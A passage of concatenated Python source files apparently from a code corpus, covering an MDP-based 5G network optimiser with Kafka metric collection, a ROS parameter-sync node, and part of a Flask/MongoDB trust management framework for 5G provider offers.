from runner.utils import reward as rewards
logging.config.dictConfig(settings.LOGGING)
logger = logging.getLogger(__name__)
class CnoAlgorithmRunner(object):
"""CNO Algorithm Runner Class.
A wrapper class for the MDP and MDPDT model classes, responsible
for executing the MDP-based algorithmic flows.
"""
REWARD_CRITERIONS = \
('cost', 'qoe', 'qoe_and_cost_combined', 'measurements', 'no_of_profiles')
def __init__(self, conf_data):
"""CNO Algorithm Runner Constructor Class.
Parameters
----------
conf_data : dict
A dictionary for the configuration of the algorithm
"""
# Initialize the proper model
self._model_type = conf_data['model']
if self._model_type == MDP:
self._model = MDPModel(conf_data)
elif self._model_type == MDP_DT:
self._model = MDPDTModel(conf_data)
# Get the weights of each reward criterion
self._reward_criterions = conf_data['reward_criterions']
self._reward_criterions['cost'] = os.getenv('CNO_IM_COST', self._reward_criterions['cost'])
self._reward_criterions['qoe'] = os.getenv('CNO_IM_QOE', self._reward_criterions['qoe'])
self._reward_criterions['qoe_and_cost_combined'] = \
os.getenv('CNO_IM_QOE_COST_COMBINED', self._reward_criterions['qoe_and_cost_combined'])
self._reward_criterions['measurements'] = \
os.getenv('CNO_IM_MEASUREMENTS', self._reward_criterions['measurements'])
self._reward_criterions['no_of_profiles'] = \
os.getenv('CNO_IM_NO_OF_PROFILES', self._reward_criterions['no_of_profiles'])
# Set the training and result files.
self.training_file = os.getenv('CNO_IM_TRAINING_FILE', conf_data['training_file'])
self.results_file = os.getenv('CNO_IM_RESULTS_FILE', conf_data['results_file'])
# No measurements have been received yet
self.last_measurements = None
@property
def model(self):
"""Return the model."""
return self._model
@property
def reward_criterions(self):
"""Return the reward type."""
return self._reward_criterions
def train(self):
"""Executes the initial training of the algorithm, provided the existence of training data."""
# Skip training if training file does not exist
if self.training_file is None or not os.path.isfile(self.training_file):
logger.error('No training file, aborting training')
return
logger.debug("Starting training ...")
# Randomly select experiences
# os.system('shuf -n 1500 {} > training/random_experiences.txt'.format(self.training_file))
# self.training_file = 'training/random_experiences.txt'
experiences, skipped_experiences = 0, 0
with open(self.training_file, 'r') as f:
for line in f:
old_measurements, action_list, new_measurements = json.loads(line)
action = tuple(action_list)
reward = self.get_reward(action=action,
old_measurements=old_measurements,
new_measurements=new_measurements)
self._model.set_state(old_measurements)
# Check if suggested action is legal and update model
legal_actions = self._model.get_legal_actions()
if action not in legal_actions:
skipped_experiences += 1
continue
self._model.update(action, new_measurements, reward)
experiences += 1
if experiences % 100 == 0:
self._model.prioritized_sweeping()
logger.debug('Trained with experience {}'.format(experiences))
logger.debug('Trained the model with {} experiences, skipped {}'.format(experiences, skipped_experiences))
def set_state(self, measurements):
"""Sets the state of the model.
Parameters
----------
measurements : dict
A dictionary of measurements
"""
self.last_measurements = measurements
self._model.set_state(measurements)
logger.debug("State set based on measurements")
def update(self, action, measurements, reward=None):
"""Updates the model and saves the experience.
Parameters
----------
action : tuple
The recently taken action
measurements : dict
A dictionary of measurements
reward : float
The reward acquired after the action
"""
if reward is None:
reward = self.get_reward(action, self.last_measurements, measurements)
experience = [self.last_measurements, action, measurements]
if self.results_file is None:
self.results_file = self.training_file
if self.results_file is not None:
with open(self.results_file, "a") as f:
f.write(json.dumps(experience) + '\n')
f.flush()
logger.debug("Recorded experience")
self.last_measurements = measurements
self._model.update(action, measurements, reward)
def set_splitting(self, split_criterion, cons_trans=True):
"""Sets the splitting criterion for MDP-DT.
Args:
split_criterion (str): The selected splitting criterion
cons_trans:
"""
if self._model_type != MDP_DT:
logger.error("Splitting criteria apply only to MDP_DT models!")
return
self._model.set_splitting_criterion(split_criterion, cons_trans)
def get_reward(self, action, old_measurements=None, new_measurements=None):
"""Computes the reward of the latest action.
This function serves as a selector of the reward type, based on the initial configuration of the model.
The types of the rewards that are supported include a QoE-based reward, a measurement-based reward, a
mixed reward and a combined QoE and cost based reward.
Parameters
----------
action : tuple
The executed action type and action value pair
old_measurements : dict, optional
A dictionary of the previous measurements
new_measurements : dict, optional
A dictionary of the last measurements
Returns
-------
reward : float
The computed reward
"""
action_type, action_value = action
reward = 1
if action_type != NO_OP:
cost_reward = 0 if self._reward_criterions['cost'] == 0 \
else rewards.cost_reward(new_measurements['percentage_of_gpu_users'])
measurements_reward = 0 if self._reward_criterions['measurements'] == 0 \
else rewards.measurement_reward(old_measurements, new_measurements)
no_of_profiles_reward = 0 if self._reward_criterions['no_of_profiles'] == 0 \
else rewards.no_of_profiles_reward(old_measurements['no_of_profiles_produced'],
new_measurements['no_of_profiles_produced'])
qoe_reward = 0 if self._reward_criterions['qoe'] == 0 \
else rewards.qoe_reward(old_measurements['mean_opinion_score'], new_measurements['mean_opinion_score'])
qoe_and_cost_combined_reward = 0 if self._reward_criterions['qoe_and_cost_combined'] == 0 \
else rewards.qoe_and_cost_combined_reward(new_measurements['qoe_sum'],
new_measurements['transcoding_cost'])
reward = \
cost_reward * self._reward_criterions['cost'] + \
measurements_reward * self._reward_criterions['measurements'] + \
no_of_profiles_reward * self._reward_criterions['no_of_profiles'] + \
qoe_and_cost_combined_reward * self._reward_criterions['qoe_and_cost_combined'] + \
qoe_reward * self._reward_criterions['qoe']
return reward * self._model.discount
def get_legal_actions(self):
"""Retrieves the legal actions from the current state."""
return self._model.get_legal_actions()
def get_suggested_action(self):
"""Returns the suggested action for the current state."""
return self._model.suggest_action()
def set_stat_test(self, statistical_test):
"""Set statistical test for MDP-DT splitting
Parameters
----------
statistical_test : str
The statistical test for splitting
"""
self._model.statistical_test = statistical_test
```
#### File: management/commands/metric_collector.py
```python
import json
import logging
from django.core.management import BaseCommand
from runner.config import KAFKA_TRANS_TOPIC, METRICS_WHITELIST, KAFKA_PREP_TOPIC
from runner.constants import VTRANSCODER_3D, VTRANSCODER_3D_SPECTATORS
from runner.utils.kafka import KafkaExporter, init_consumer_and_subscribe
logger = logging.getLogger('metric_collector')
def metric_collector():
"""Connects on Kafka Bus and collects metrics for active vTranscoders and spectators. """
# Initialize consumer and exporter
consumer = init_consumer_and_subscribe(topic=KAFKA_TRANS_TOPIC,
group_id_suffix='IMMERSIVE_MEDIA_PREPROCESSING')
kafka_exporter = KafkaExporter()
# Metrics Dict
metrics_per_resource_id = {}
for msg in consumer:
try:
payload = json.loads(msg.value.decode('utf-8', 'ignore'))
except json.JSONDecodeError as jde:
logger.error(jde)
continue
# Check if VIM tag is the required
vim_tag = payload['mano']['vim']['tag']
if vim_tag not in [VTRANSCODER_3D, VTRANSCODER_3D_SPECTATORS]:
logger.debug('VIM tag was {}. Ignoring ...'.format(vim_tag))
continue
# Check if metric is in whitelist
if payload['metric']['name'] not in METRICS_WHITELIST:
logger.debug('Metric was {}. Ignoring ...'.format(payload['metric']['name']))
continue
# Get metric details
mano_vdu_id = payload['mano']['vdu']['id']
metric = payload['metric']
metric_name = metric['name']
metric_value = metric['value']
metric_timestamp = metric['timestamp']
# If the metrics refer to spectators
if vim_tag == VTRANSCODER_3D_SPECTATORS:
client_id = payload['spectator']['client_id']
group_id = payload['spectator']['group_id']
resource_id = (client_id, group_id, mano_vdu_id)
logger.debug('Received metric [{}] for resource [{}].'.format(metric_name, resource_id))
if resource_id in metrics_per_resource_id.keys():
if metrics_per_resource_id[resource_id][metric_name] is None:
metrics_per_resource_id[resource_id][metric_name] = metric_value
if None not in metrics_per_resource_id[resource_id].values():
payload.pop('metric')
payload['timestamp'] = metric_timestamp
payload['measurements'] = metrics_per_resource_id[resource_id]
logger.info('Collected measurements for resource [{}]: `{}`'
.format(resource_id, payload['measurements']))
kafka_exporter.publish_message(KAFKA_PREP_TOPIC, payload)
metrics_per_resource_id[resource_id] = dict.fromkeys(metrics_per_resource_id[resource_id], None)
else:
logger.debug('Resource [] has now been recorded.'.format(resource_id))
metrics_per_resource_id[resource_id] = {
'bitrate_aggr': None,
'bitrate_on': None,
'framerate_aggr': None,
'framerate_on': None,
'latency_aggr': None,
'working_fps': None,
'output_data_bytes': None,
'theoretic_load_percentage': None
}
metrics_per_resource_id[resource_id][metric_name] = metric_value
# If the metrics refer to vTranscoders
if vim_tag == VTRANSCODER_3D:
for resource in metrics_per_resource_id.keys():
if resource[-1] == mano_vdu_id:
logger.debug('Set metric [{}] for resource [{}].'.format(metric_name, resource))
metrics_per_resource_id[resource][metric_name] = metric_value
class Command(BaseCommand):
def handle(self, *args, **options):
metric_collector()
```
#### File: management/commands/publish_metrics_for_qoe.py
```python
import json
import logging
import random
import time
from datetime import datetime
from django.core.management import BaseCommand
from kafka import KafkaProducer
from kafka.errors import KafkaError
from cno.settings.base import LOGGING
from runner.config import KAFKA_API_VERSION, KAFKA_SERVER
from simulation.constants import mano
logging.config.dictConfig(LOGGING)
logger = logging.getLogger(__name__)
def publish_metrics_for_qoe():
# Kafka Producer Set Up
# https://kafka-python.readthedocs.io/en/master/apidoc/KafkaProducer.html
producer = KafkaProducer(bootstrap_servers=KAFKA_SERVER, api_version=KAFKA_API_VERSION,
value_serializer=lambda v: json.dumps(v).encode('utf-8'))
while True:
# Push the metric values in batch per container ID
prep_metric = {
'mano': mano,
'measurements':
{
'working_fps': 11,
'output_mesh_size_bytes': 45000,
'output_textures_size_bytes': 25000,
'container_network_transmit_packets_dropped_total': random.uniform(0, 2)
},
'timestamp': datetime.now().isoformat()
}
request = producer.send('ns.instances.prep', key=b'qoe', value=prep_metric)
try:
request.get(timeout=60)
except KafkaError as ke:
logger.error(ke)
time.sleep(30)
class Command(BaseCommand):
def handle(self, *args, **options):
publish_metrics_for_qoe()
```
#### File: management/commands/simulate.py
```python
import json
import logging.config
from django.conf import settings
from django.core.management import BaseCommand
from kafka import KafkaConsumer, KafkaProducer
from kafka.errors import KafkaError
from runner.cno_algorithm_runner import CnoAlgorithmRunner
from simulation.config import KAFKA_TOPIC_PATTERN, KAFKA_API_VERSION, KAFKA_SERVER, KAFKA_CLIENT_ID, KAFKA_GROUP_ID, \
KAFKA_PLANNING_TOPIC
logging.config.dictConfig(settings.LOGGING)
logger = logging.getLogger(__name__)
def simulate():
consumer = KafkaConsumer(bootstrap_servers=KAFKA_SERVER, client_id=KAFKA_CLIENT_ID, enable_auto_commit=True,
value_deserializer=lambda v: json.loads(v.decode('utf-8', 'ignore')),
api_version=KAFKA_API_VERSION, group_id=KAFKA_GROUP_ID)
consumer.subscribe(pattern=KAFKA_TOPIC_PATTERN)
logger.debug('Initialized Kafka Consumer & subscribed to pre-processing topic')
producer = KafkaProducer(bootstrap_servers=KAFKA_SERVER, client_id=KAFKA_CLIENT_ID,
value_serializer=lambda v: json.dumps(v).encode('utf-8'),
api_version=KAFKA_API_VERSION, )
logger.debug('Initialized Kafka Producer')
# Initialize CNO Algorithm Runner for Simulation
runner = CnoAlgorithmRunner('simulation')
# Train MDP Model
runner.train()
# Run simulation for 100 collections of measurements
awaiting_reward, old_measurements = False, {}
for msg in consumer:
if msg.key is None:
continue
if msg.key.decode('utf-8') != 'sim':
continue
if awaiting_reward:
# Get reward
reward = runner.get_reward((action_type, action_value), old_measurements, measurements)
# Record experience and update
runner.update((action_type, action_value), measurements, reward)
old_measurements = measurements
awaiting_reward = False
continue
# Get measurements, set state, get suggested action
measurements = msg.value['measurements']
runner.set_state(measurements)
action_type, action_value = runner.get_suggested_action()
logger.info('Received set of measurements {}. Suggested Action: {} {}'
.format(measurements, action_type, action_value))
# Remove measurements from message
# msg.pop('measurements')
# Record the action and publish to (P)lanning for (E)xecution of action
# analysis['analysis'] = {'action': action_type, 'value': action_value}
# Publish to Kafka
request = producer.send(KAFKA_PLANNING_TOPIC, {'analysis': {'action': action_type, 'value': action_value}})
try:
request.get(timeout=60)
except KafkaError as ke:
logger.error(ke)
runner.model.print_state_details()
logger.debug('Simulation has finished')
class Command(BaseCommand):
def handle(self, *args, **options):
simulate()
``` |
{
"source": "5G-Sentosa/its_multimaster",
"score": 2
} |
#### File: fkie_master_sync/nodes/param_sync.py
```python
import rospy
from fkie_master_discovery.common import masteruri_from_master
from fkie_multimaster_msgs.msg import MasterState
def master_changed(msg, cb_args):
param_cache, local_master, __add_ns, __ignore, __only = cb_args
local_name = ''
if local_master:
local_name = local_master[0]
if msg.master.uri != masteruri_from_master() and local_name in param_cache:
master_to = rospy.MasterProxy(masteruri_from_master())
master_from = rospy.MasterProxy(msg.master.uri)
rospy.logdebug("Getting params from {}...".format(msg.master.uri))
params_from = master_from.getParam('/')[2]
if not __add_ns:
for key in ['run_id', 'rosversion', 'roslaunch', 'rosdistro', 'master_sync', 'master_discovery', 'capabilities', 'mastername', 'robots']:
try:
del params_from[key]
except Exception:
pass
for key in __ignore + [local_name, '/'+local_name]:
try:
del params_from[key]
except Exception:
pass
if __only:
for key in params_from.keys():
if key not in __only:
del params_from[key]
rospy.logdebug("Syncing params from {} to {}...".format(msg.master.name, local_name))
if __add_ns:
_ns = msg.master.name
else:
_ns = ''
rospy.logdebug("Got {} params.".format(len(params_from)))
if param_cache.get(_ns, None) != params_from:
param_cache[_ns] = params_from
for key, value in params_from.items():
master_to.setParam('/'+_ns+key, value)
rospy.logdebug("Done syncing params from {} to {}.".format(msg.master.name, local_name))
else:
rospy.logdebug("Params have not changed from {} to {}.".format(msg.master.name, local_name))
else:
local_name = msg.master.name
local_master.append(local_name)
master_from = rospy.MasterProxy(msg.master.uri)
rospy.logdebug("Getting params from local {}...".format(msg.master.uri))
param_cache[local_name] = master_from.getParam('/')[2]
rospy.logdebug("Got {} local params.".format(len(param_cache[local_name])))
def main():
rospy.init_node('param_sync', log_level=rospy.DEBUG)
param_cache = dict()
local_master = list()
masteruri_from_master()
__add_ns = rospy.get_param('~add_ns', True)
__ignore = rospy.get_param('~ignore', [])
__only = rospy.get_param('~only', [])
sub = rospy.Subscriber('master_discovery/changes', MasterState, master_changed, callback_args=(param_cache, local_master, __add_ns, __ignore, __only))
rospy.spin()
if __name__ == '__main__':
main()
``` |
{
"source": "5GZORRO/5G-TRMF",
"score": 2
} |
#### File: 5G-TRMF/peer_Trust_Model/trustManagementFramework.py
```python
import json
import sys
import logging
from flask import Flask, request
from flask_restful import Resource, Api
from gevent.pywsgi import WSGIServer
import random
import time
import requests
import ast
import re
from pymongo import MongoClient
import pprint
import csv
import threading
from threading import Lock
from dotenv import load_dotenv
from peerTrust import *
from producer import *
from consumer import *
from trustInformationTemplate import *
from datetime import datetime
from multiprocessing import Process, Value, Manager
logging.basicConfig(level=logging.INFO)
import queue
from gevent import monkey
monkey.patch_all()
app = Flask(__name__)
api = Api(app)
producer = Producer()
consumer = Consumer()
peerTrust = PeerTrust()
data_lock = Lock()
trustInformationTemplate = TrustInformationTemplate()
client = MongoClient(host='mongodb-trmf', port=27017, username='5gzorro', password='password')
db = client.rptutorials
mongoDB = db.tutorial
dlt_headers = ["trustorDID","trusteeDID", "offerDID", "userSatisfaction","interactionNumber","totalInteractionNumber", "currentInteractionNumber"]
dlt_file_name = 'DLT.csv'
provider_list = []
considered_offer_list = []
consumer_instance = None
history = {}
trustor_acquired = False
trustorDID = ""
update_catalog = False
thread_catalog = False
timestamp_thread_catalog = 0
TIME_TO_UPDATE_CATALOG_INFO = 600
gather_time = 0
compute_time = 0
storage_time = 0
update_time = 0
satisfaction = 0
credibility = 0
TF = 0
CF = 0
offer_type = {}
product_offering = []
old_product_offering = []
statistic_catalog = []
threads = list()
""" Parameters to define a minimum interactions in the system and avoid a cold start"""
max_previous_providers_DLT = 4
max_previous_providers_interactions_DLT = 3
max_previous_interactions_DLT = max_previous_providers_DLT * max_previous_providers_interactions_DLT
def find_by_column(column, value):
""" This method discovers interactions registered in the DLT looking at one specific value"""
list = []
"""with open(filename) as f:
reader = csv.DictReader(f)
for item in reader:
if item[column] == value:
list.append(item)"""
for interaction in peerTrust.kafka_interaction_list:
if interaction[column] == value:
list.append(interaction)
return list
def write_data_to_csv(filename, rows):
with open(filename, 'a', encoding='UTF8', newline='') as dlt_data:
writer = csv.DictWriter(dlt_data, fieldnames=dlt_headers)
writer.writerows(rows)
def write_only_row_to_csv(filename, row):
with open(filename, 'a', encoding='UTF8', newline='') as dlt_data:
writer = csv.DictWriter(dlt_data, fieldnames=dlt_headers)
writer.writerow(row)
class initialise_offer_type(Resource):
""" This class recaps the type of offers being analysed per request. Then, the informatation is leveraged by the
Computation and Update classes"""
def post(self):
global offer_type
req = request.data.decode("utf-8")
offer_type = json.loads(req)
return 200
class start_data_collection(Resource):
""" This method is responsible for creating the minimum information in the 5G-TRMF framework
to avoid the cold start """
def post(self):
global trustor_acquired
global gather_time
global compute_time
global storage_time
global update_time
global satisfaction
global credibility
global TF
global CF
global considered_offer_list
global update_catalog
global thread_catalog
global timestamp_thread_catalog
gather_time, compute_time, storage_time, update_time, satisfaction, credibility, TF, CF = 0, 0, 0, 0, 0, 0, 0, 0
trustor_acquired = False
max_trust_score = 0
max_trust_score_offerDID = ""
time_file_name = 'tests/time.csv'
time_headers = ["start_timestamp","end_timestamp","total_time", "total_without_cold", "cold_time", "gather_time", "compute_time",
"storage_time", "update_time","satisfaction","credibility","TF", "CF", "offers"]
req = request.data.decode("utf-8")
dict_product_offers = json.loads(req)
initial_timestamp = time.time()
trust_scores = []
list_product_offers = {}
considered_offer_list = []
kafka_minimum_interaction_list = []
""" Loading Catalog information and launching thread to update info after 10 minutes"""
if not update_catalog:
self.gatherin_POs_catalog(False)
update_catalog = True
timestamp_thread_catalog = int(str(time.time()).split(".")[0])
else:
if not thread_catalog and int(str(time.time()).split(".")[0]) - timestamp_thread_catalog >= TIME_TO_UPDATE_CATALOG_INFO:
x = threading.Thread(target=self.gatherin_POs_catalog, args=(True,))
x.start()
thread_catalog = True
timestamp_thread_catalog = int(str(time.time()).split(".")[0])
elif thread_catalog and int(str(time.time()).split(".")[0]) - timestamp_thread_catalog >= TIME_TO_UPDATE_CATALOG_INFO:
x = threading.Thread(target=self.gatherin_POs_catalog, args=(True,))
x.start()
timestamp_thread_catalog = int(str(time.time()).split(".")[0])
""" If it is not the first time that the 5G-TRMF is executed, it should retrieve information from the MongoDB
in case of such an information is not already loaded in the historical parameter """
for trustee in dict_product_offers:
if trustor_acquired == False:
trustorDID = dict_product_offers[trustee]
list_product_offers['trustorDID'] = trustorDID
trustor_acquired = True
else:
for offer in dict_product_offers[trustee]:
considered_offer_list.append({'trusteeDID': trustee, 'offerDID': offer})
""" In case of first time the 5G-TRMF is executed, we should retrieve information from MongoDB and
check if it is already or not in the historical"""
previous_interaction = mongoDB.find({'trustee.offerDID': offer})
offer_found = False
if previous_interaction is not None:
for interaction in previous_interaction:
del interaction['_id']
if interaction['trustor']['trusteeDID'] == trustee and \
interaction['trustor']['offerDID'] == offer:
if interaction not in peerTrust.historical:
peerTrust.historical.append(interaction)
offer_found = True
if not offer_found:
if trustee in list_product_offers:
list_product_offers[trustee].append(offer)
else:
list_product_offers[trustee] = [offer]
#consumer.start("TRMF-interconnections")
#consumer.subscribe("TRMF-interconnections")
#cold_start_info = consumer.start_reading_cold_start(max_previous_interactions_DLT)
consumer.start("TRMF-interconnections")
consumer.subscribe("TRMF-interconnections")
kafka_minimum_interaction_list = consumer.start_reading_minimum_interactions()
if len(list_product_offers) >= 1 and bool(kafka_minimum_interaction_list):
peerTrust.kafka_interaction_list = kafka_minimum_interaction_list
""" Adding a set of minimum interactions between entities that compose the trust model """
#if len(list_product_offers)>1 and not bool(cold_start_info):
#minimum_data = peerTrust.minimumTrustValuesDLT(producer, consumer, trustorDID, list_product_offers)
#for data in minimum_data:
#producer.createTopic("TRMF-interconnections")
#producer.sendMessage("TRMF-interconnections", trustorDID, data)
#producer.createTopic("TRMF-historical")
#producer.sendMessage("TRMF-historical", trustorDID, peerTrust.historical)
#elif len(list_product_offers) >= 1 and bool(cold_start_info):
#"If we don't have the minimum stakeholder interactions we load from Kafka"
#if not bool(peerTrust.historical):
#consumer.start("TRMF-historical")
#consumer.subscribe("TRMF-historical")
#historical = consumer.start_reading_minimum_historical()
#peerTrust.kafka_interaction_list = kafka_minimum_interaction_list
#print("Kafka Cargado: ", peerTrust.kafka_interaction_list)
#for i in historical:
#if i not in peerTrust.historical:
#peerTrust.historical.append(i)
#"Adding a set of minimum interaction between entities but generated by other TRMF"
#backup = []
#for trustee in cold_start_info:
#backup.append(cold_start_info[trustee])
#if trustee not in peerTrust.list_additional_did_providers:
#peerTrust.list_additional_did_providers.append(trustee)
#"If we don't have the minimum stakeholder interactions we load from Kafka"
#if not all(elem in peerTrust.kafka_interaction_list for elem in kafka_minimum_interaction_list):
#peerTrust.kafka_interaction_list = kafka_minimum_interaction_list
#print("Kafka Cargado: ", peerTrust.kafka_interaction_list)
#peerTrust.list_additional_did_offers = backup
trustor_acquired = False
for trustee in dict_product_offers:
if trustor_acquired == False:
trustor_acquired = True
else:
for offer in dict_product_offers[trustee]:
if trustee+"$"+offer not in provider_list:
provider_list.append(trustee+"$"+offer)
""" we generated initial trust information to avoid the cold start"""
print("$$$$$$$$$$$$$$ Starting cold start procces on ",trustee, " $$$$$$$$$$$$$$\n")
for key, value in list_product_offers.items():
if offer in value:
peerTrust.generateHistoryTrustInformation(producer, consumer, trustorDID, trustee, offer, 3)
""" Establish two new interactions per each provider"""
#peerTrust.setTrusteeInteractions(producer, consumer, trustee, 2)
print("\n$$$$$$$$$$$$$$ Ending cold start procces on ",trustee, " $$$$$$$$$$$$$$\n")
""" Retrieve information from trustor and trustee """
data = {"trustorDID": trustorDID, "trusteeDID": trustee, "offerDID": offer, "topicName": trustorDID}
response = requests.post("http://localhost:5002/gather_information", data=json.dumps(data).encode("utf-8"))
response = json.loads(response.text)
if response["trust_value"] > max_trust_score:
max_trust_score = response["trust_value"]
max_trust_score_offerDID = response["trusteeDID"]["offerDID"]
trust_scores.append(response)
"We are currently registering as a new interaction the offer with the highest trust score"
for interaction in reversed(peerTrust.historical):
if interaction["trust_value"] == max_trust_score and \
interaction["trustor"]["offerDID"] == max_trust_score_offerDID:
"""data = {"trustorDID": trustorDID, "trusteeDID": interaction["trustor"]["trusteeDID"], "offerDID": max_trust_score_offerDID,
"userSatisfaction": interaction["trustor"]["direct_parameters"]["userSatisfaction"],
"interactionNumber": interaction["trustor"]["direct_parameters"]["interactionNumber"],
"totalInteractionNumber": interaction["trustor"]["direct_parameters"]["totalInteractionNumber"],
"currentInteractionNumber": interaction["currentInteractionNumber"]}"""
" Modifying the interaction number as the most recent one "
interaction["currentInteractionNumber"] = peerTrust.getCurrentInteractionNumber(trustorDID)
interaction["trustor"]["direct_parameters"]["totalInteractionNumber"] = \
peerTrust.getLastTotalInteractionNumber(interaction["trustor"]["trusteeDID"])
load_dotenv()
trmf_endpoint = os.getenv('TRMF_5GBARCELONA')
message = {"trustorDID": trustorDID, "trusteeDID": interaction["trustor"]["trusteeDID"], "offerDID": max_trust_score_offerDID,
"interactionNumber": interaction["trustor"]["direct_parameters"]["interactionNumber"],
"totalInteractionNumber": interaction["trustor"]["direct_parameters"]["totalInteractionNumber"],
"currentInteractionNumber": interaction["currentInteractionNumber"], "timestamp": interaction["endEvaluationPeriod"],
"endpoint":trmf_endpoint}
#write_only_row_to_csv(dlt_file_name, data)
#producer.start()
producer.createTopic("TRMF-interconnections")
producer.sendMessage("TRMF-interconnections",max_trust_score_offerDID, message)
"Adjusting the parameters based on new interactions"
#interaction["trustor"]["direct_parameters"]["interactionNumber"] = message["interactionNumber"]
#interaction["currentInteractionNumber"] = message["currentInteractionNumber"]
#peerTrust.historical.append(interaction)
if not os.path.exists("tests"):
os.makedirs("tests")
"Time measurements of the different phases to perform internal tests"
if not os.path.exists(time_file_name):
with open(time_file_name, 'w', encoding='UTF8', newline='') as time_data:
writer = csv.DictWriter(time_data, fieldnames=time_headers)
writer.writeheader()
data = {"start_timestamp": initial_timestamp,"end_timestamp": time.time(), "total_time": time.time()-initial_timestamp,
"total_without_cold": gather_time+compute_time+storage_time+update_time,"cold_time":
time.time()-initial_timestamp-gather_time-compute_time-storage_time-update_time,
"gather_time": gather_time, "compute_time": compute_time, "storage_time": storage_time,
"update_time": update_time, "satisfaction": satisfaction, "credibility": credibility,
"TF": TF, "CF": CF, "offers": 1000}
writer.writerow(data)
else:
with open(time_file_name, 'a', encoding='UTF8', newline='') as time_data:
writer = csv.DictWriter(time_data, fieldnames=time_headers)
data = {"start_timestamp": initial_timestamp,"end_timestamp": time.time(), "total_time": time.time()-initial_timestamp,
"total_without_cold": gather_time+compute_time+storage_time+update_time,"cold_time":
time.time()-initial_timestamp-gather_time-compute_time-storage_time-update_time,
"gather_time": gather_time, "compute_time": compute_time, "storage_time": storage_time,
"update_time": update_time, "satisfaction": satisfaction, "credibility": credibility,
"TF": TF, "CF": CF, "offers": 1000}
writer.writerow(data)
return json.dumps(trust_scores)
def gatherin_POs_catalog(self, update_statistic):
global statistic_catalog
global old_product_offering
if not bool(statistic_catalog) or update_statistic:
"""Requesting all product offering objects"""
"5GBarcelona"
load_dotenv()
barcelona_address = os.getenv('5GBARCELONA_CATALOG_A')
response = requests.get(barcelona_address+"productCatalogManagement/v4/productOffering")
"5TONIC"
#madrid_address = os.getenv('5TONIC_CATALOG_A')
#response = requests.get(madrid_address+"productCatalogManagement/v4/productOffering")
product_offering = json.loads(response.text)
if bool(product_offering) and product_offering != old_product_offering:
"If there is any change in the Catalog, we need to update all statistics"
statistic_catalog = []
for i in product_offering:
"Delete once the HTTP request will not be filtered in 5GBarcelona"
if product_offering.index(i) < 111450:
"Added to avoid some malformed POs"
if "href" in i['productSpecification']:
href = i['productSpecification']['href']
id_product_offering = i['id']
"Added to avoid some malformed POs"
if len(i['place']) > 0:
product_offering_location = i['place'][0]['href']
category = i['category'][0]['name']
""" Obtaining the real product offer specification object"""
response = requests.get(href)
response = json.loads(response.text)
if 'relatedParty' in response:
did_provider = response['relatedParty'][0]['extendedInfo']
else:
did_provider = ''
""" Obtaining the location of the product offering object"""
response = requests.get(product_offering_location)
response = json.loads(response.text)
"Check whether the POs have location information"
new_object = {}
location = ""
if "city" and "country" and "locality" in response:
city = response['city']
country = response['country']
locality = response['locality']
x_coordinate = response['geographicLocation']['geometry'][0]['x']
y_coordinate = response['geographicLocation']['geometry'][0]['y']
z_coordinate = response['geographicLocation']['geometry'][0]['z']
location = str(x_coordinate)+"_"+str(y_coordinate)+"_"+str(z_coordinate)
"Initialise the object"
new_object["provider"] = did_provider
new_object["n_resource"] = 1
new_object[location] = 1
new_object["active"] = 0
new_object["active"+"_"+location] = 0
new_object["active"+"_"+category.lower()] = 0
new_object["active"+"_"+category.lower()+"_"+location] = 0
if i['lifecycleStatus'] == 'Active':
new_object["active"] = 1
new_object["active"+"_"+location] = 1
new_object["active"+"_"+category.lower()] = 1
new_object["active"+"_"+category.lower()+"_"+location] = 1
if not bool(statistic_catalog):
statistic_catalog.append(new_object)
elif bool(new_object):
"This variable will check whether we have a new provider in the Catalog"
new_provider = True
for product_offer in statistic_catalog:
if product_offer["provider"] == did_provider:
new_provider = False
product_offer["n_resource"] = product_offer["n_resource"] + new_object["n_resource"]
if location not in product_offer:
product_offer[location] = new_object[location]
else:
product_offer[location] = product_offer[location] + new_object[location]
product_offer['active'] = product_offer['active'] + new_object["active"]
if 'active'+"_"+location not in product_offer:
product_offer['active'+"_"+location] = new_object["active"+"_"+location]
else:
product_offer["active"+"_"+location] = product_offer["active"+"_"+location] + new_object["active"+"_"+location]
if "active"+"_"+category.lower() not in product_offer:
product_offer['active'+"_"+category.lower()] = new_object["active"+"_"+category.lower()]
else:
product_offer["active"+"_"+category.lower()] = product_offer["active"+"_"+category.lower()] + new_object["active"+"_"+category.lower()]
if "active"+"_"+category.lower()+"_"+location not in product_offer:
product_offer['active'+"_"+category.lower()+"_"+location] = new_object["active"+"_"+category.lower()+"_"+location]
else:
product_offer["active"+"_"+category.lower()+"_"+location] = product_offer["active"+"_"+category.lower()+"_"+location] + new_object["active"+"_"+category.lower()+"_"+location]
"Only when the provider is new, we add a new object"
if new_provider:
statistic_catalog.append(new_object)
old_product_offering = product_offering
class gather_information(Resource):
def post(self):
""" This method will retrieve information from the historical (MongoDB)+
search for supplier/offer interactions in the simulated DLT to retrieve recommendations from
other 5G-TRMFs. Currently there is no interaction with other 5G-TRMFs, we generate our
internal information """
global gather_time
""" Retrieve parameters from post request"""
req = request.data.decode("utf-8")
parameter = json.loads(req)
trustorDID = parameter["trustorDID"]
trusteeDID = parameter["trusteeDID"]
offerDID = parameter["offerDID"]
topic_name = parameter["topicName"]
print("$$$$$$$$$$$$$$ Starting data collection procces on ",trusteeDID, " $$$$$$$$$$$$$$\n")
start_time = time.time()
"""Read last value registered in the historical"""
last_trust_value = consumer.readLastTrustValueOffer(peerTrust.historical, trustorDID, trusteeDID, offerDID)
print("\nThe latest trust interaction (history) of "+trustorDID+" with "+trusteeDID+" was:\n",last_trust_value, "\n")
"""Read interactions related to a Trustee"""
interactions = self.getInteractionTrustee(trustorDID, trusteeDID)
print("Public information from "+trusteeDID+" interactions registered in the DLT:\n", interactions, "\n")
print("$$$$$$$$$$$$$$ Ending data collection procces on ",trusteeDID, " $$$$$$$$$$$$$$\n")
gather_time = gather_time + (time.time()-start_time)
###print("Gather time: ", gather_time)
""" Retrieve information from trustor and trustee """
trust_information = []
current_offer = {"trustorDID": trustorDID, "trusteeDID": trusteeDID, "offerDID": offerDID, "topicName": topic_name, "lastValue": last_trust_value, "trusteeInteractions": interactions}
trust_information.append(current_offer)
response = requests.post("http://localhost:5002/compute_trust_level", data=json.dumps(trust_information).encode("utf-8"))
response = json.loads(response.text)
return response
def getInteractionTrustee(self, trustorDID, trusteeDID):
""" This method retrieves all interactions related to a Trustee"""
return find_by_column("trustorDID", trusteeDID)
class compute_trust_level(Resource):
def post(self):
"""This method retrieves the last value of the Trustor for a particular Trustee and the Trustee's interactions.
It will then do the summation from its last computed value to the recent one by updating it trust value over
the trustee """
global compute_time
